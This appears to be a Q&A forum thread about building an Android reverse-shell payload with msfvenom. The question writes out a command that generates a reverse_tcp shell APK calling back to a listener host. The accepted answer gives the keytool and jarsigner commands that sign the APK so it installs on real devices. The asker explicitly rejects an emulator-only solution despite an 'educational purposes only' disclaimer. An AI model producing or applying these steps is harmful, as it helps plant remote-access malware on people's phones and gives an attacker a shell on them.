# msfvenom payload problem

Tags: android, metasploit, kali-linux

This is for educational purposes only!

I'm trying to generate android payload using msfconsole payload standalone generator: `msfvenom` with the command:

```
msfvenom -p android/shell/reverse_tcp LHOST=192.168.100.4 LPORT=4444 R > android_shell.apk
```

My problem is that the apk refuse to install on any android version "I tried 4.0 to 4.3" and it shows the message:

> application not installed

What am I doing wrong? Is there some kind of signing for the apk file?

Comment: Have you tried tools/exploit/install_msf_apk.sh script?

Comment: can you provide a small explanation about this script please ?

Comment: The payload generated by the msfvenom is self signed which means you need to check the "Unknown sources" option. Also, the script only installs the package to an emulator so you can use it for testing.

Comment: this is not an option, I need some solution to make the APK works on various android versions and not just an emulator

Answer (score 4, accepted):

I've found my answer, referring to [Signing Your Applications](http://developer.android.com/tools/publishing/app-signing.html) on Android developer, **the apk needed to be signed**.

However, I had to do it manually on Kali using the commands:

- For generating the keystore:

  `keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000`
- For singing the App:

  `jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name`